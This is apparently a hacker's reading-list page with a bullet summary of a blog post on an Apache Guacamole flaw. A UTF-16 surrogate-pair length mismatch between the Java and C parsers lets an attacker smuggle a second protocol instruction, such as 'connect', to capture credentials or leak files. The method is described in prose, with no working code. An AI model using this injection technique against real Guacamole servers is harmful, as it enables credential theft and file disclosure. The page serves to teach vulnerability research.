Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Code Interoperability: The Hazards of Technological Variety- 1409

Stefan SchillerPosted 1 Year Ago
  • Apache Guacamole is a remote desktop gateway server. The architecture consists of a Java component with a C backend server. So, they go through a classic difference between two parsers to create serious security impact.
  • All communication is done via the custom Guacamole protocol, which is a generic wrapper that abstracts SSH, VNC and SSH. This contains an opcode with a length and value, then arguments after the opcode. When initially connecting to a server, the select instruction is used. Most values are taken from a database but the image type is directly controlled by a connecting attacker.
  • The documentation states that the LENGTH field is not the bytelength but the codepoint length for UTF8. Since UTF8 implementations differ and we have two locations parsing the characters (Java and C), there is likely to be a bug here. The article has a good descriptor on what they mean by this - Technological Variety.
  • To test this out, they wrote a small fuzzing harness. The fuzzer would generate random unicode symbols then have both Java and C process it. If there is a difference, then we have a problem. After some fuzzing, they ran into a difference in the length() of the object in Java compared to C. Sending in a 4 byte UTF8 character sequence was interpreted as a 2 byte sequence in Java. Why?
  • In Java 9, they use compact strings. So, this means that strings are either dynamically encoded as LATIN-1 or UTF-16 depending on the situation, dynamically. For instance, an 'A' is encoded as a LATIN-1 string internally but the greek beta would be encoded as UTF-16. What's weird about this is incoming data in UTF8 must be converted to UTF-16.
  • The byte length is determined by shifting the byte array of the coder value. If it's LATIN-1, then just one byte. If it's UTF16 then it's encoded by dividing the length by 2. For 1,2 and 3 byte sequences the logic works fine. However, there is a subtle issue when dealing with 4 byte UTF8 sequences.
  • In particular, the conversion turns this into a surrogate pair instead of a single codepoint! As a result, only the first part of the surrogate pair is recognized in the length, resulting in less bytes being processed than expected. The Java length() function returns the number of Unicode code units instead of code points. Weird!
  • To exploit this, we have to think about the parsing of it. The instruction creation step is done by the Java side then the instruction parsing is done by the C side, in this order. The blog post has some amazing graphics for understanding this, so please refer to do that. The idea is to send two GUAC_IMAGE parameters: one with four 4 byte unicode characters and the other with our payload we want to smuggle in.
  • The one with the four 4 byte unicode characters will be set to contain a length of 8 by the Java service. However, the C service will see each of these as a single codepoint! As a result, it will read more than the expected 4 bytes and read 8 instead. So, the second set of bytes is where we smuggle in our input. By putting a semi-colon then extra data, the command will be interpreted as a new instruction!
  • What do we want to smuggle in though? If we smuggle in the connect instruction, we can control the host that an attacker connects to. This can be used to leverage data, such as credentials. Or, RDP drive redirection can be enabled to leak world-readable files on the server.
  • Integrating between difference languages appears to be absolute hell for encoding. The post is amazing at talking about the differences between parsers and is super enjoyable for that reason. I personally don't like the text-based wire format for Guacamole, as it is prone to these types of issues. Great read!